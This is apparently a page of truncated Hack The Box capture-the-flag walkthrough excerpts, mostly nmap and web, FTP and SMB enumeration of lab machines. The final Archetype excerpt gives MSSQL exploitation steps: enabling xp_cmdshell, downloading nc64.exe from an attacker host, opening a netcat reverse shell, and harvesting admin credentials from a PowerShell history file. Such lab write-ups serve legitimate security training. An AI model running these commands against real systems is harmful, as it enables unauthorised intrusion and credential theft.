1. Nmap scanning nmap 10.10.11.221 -sC -sV --open Findings Port 22 (SSH) Port 80 (HTTP) 2. Enumeration To access the website we need to resolve the hostname to ip in etc/hosts file: echo "10.10.11.221 2million.htb" | sudo tee -a Visit /invite page and you can find inviteapi.min.js file in devtools. Deobfuscate it at https://matthewfl.com/unPacker.html. We got: There is makeInviteCode() function that sends API POST request to /api/v1/how/to/generate. Use curl or Burpsuite Repeater to send requests. It’s important that you save PHPSESSID cookie somewhere. ...

1. Nmap scanning nmap 10.10.10.245 -sC -sV --open -oN scans/nmap_inital Findings Port 21 (FTP) Port 22 (SSH) Port 80 (Gunicorn HTTP server) 2. Enumeration FTP Let’s try to connect to FTP service, maybe it’s misconfugured. Nah… it needs user with a password. HTTP When visiting the website, we find ourselves in the security dashboard. In burger menu there is Security Snapshot page. When downloading the snapshot we see 8.pcap file that contains nothing useful for us. Let’s try to change request to: ...

Start with scanning all the open ports on the host. 1. Nmap Scanning nmap 10.129.96.149 -sC -sV --open -oA scans/nmap_initial note: before adding -oA scans/your_nmap_scan make sure you have scans/ folder otherwise nmap will give an error about non-existing directory. Findings Port 22 (SSH) Port 6789 (ibm-db2-admin?) Port 8080 (Apache Tomcat HTTP server) Port 8443 (Nagios NSCA) 2. Enumeration There are a lot of ports avaliable for us but let’s visit http server first, it’s easy. Before that, start Burpsuite maybe it’ll come in handy. I will use chromium with proxy + Burpsuite: ...

1. Nmap scanning Just as always: let’s scan open ports using nmap: nmap 10.129.127.158 -sC -sV --open Findings Port 21 (FTP) is open, also it shows like there is a file named backup.zip on the server Port 22 (SSH) is open Port 80 (Apache http server) - let’s access it on the web later 2. Enumeration FTP Server Let’s try log in ftp service without a password with username anonymous. It will ask you for password, you can just hit ENTER. ...

Let’s start with scanning the sevices running on the host. 1. Nmap scanning nmap 10.129.5.130 -sC -sV --open Findings: Port 80 is open (Apache server), we can access it with browser Port 22 is open (SSH) 2. Web Enumeration Website is probably about some vehicle services. Scrolling the page, we encounter interesting section about an existing login page. We should find out more about that login form page, so we can use Burpsuite to retrieve all the data about the website. Start the burpsuite: ...

1. Initial Recon Nmap Scan nmap -sCV -p- --open 10.129.95.187 -oN nmap_scan Findings: Port 445 (SMB) - Potential file shares Port 1433 (MSSQL) - Microsoft SQL Server 2. SMB Enumeration List Shares smbclient -L -N //10.129.95.187 Found share: backups Access Share smbclient \\\\10.129.95.187\\backups -N Downloaded prod.dtsConfig containing credentials: User: ARCHETYPE\sql_svc Password: M3g4c0rp123 3. MSSQL Exploitation Setup Impacket python -m venv impacket_venv source impacket_venv/bin/activate pip install . Connect to MSSQL python examples/mssqlclient.py ARCHETYPE/sql_svc:M3g4c0rp123@10.129.95.187 -windows-auth Enable xp_cmdshell EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; 4. Reverse Shell Setup Listener nc -lvnp 443 Transfer nc.exe xp_cmdshell "powershell -c wget http://YOUR_IP/nc64.exe -outfile C:\Users\sql_svc\Downloads\nc64.exe" Execute Shell xp_cmdshell "C:\Users\sql_svc\Downloads\nc64.exe -e cmd.exe YOUR_IP 443" 5. Privilege Escalation Found Credentials type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt Found admin credentials: administrator:MEGACORP_4dm1n!! ...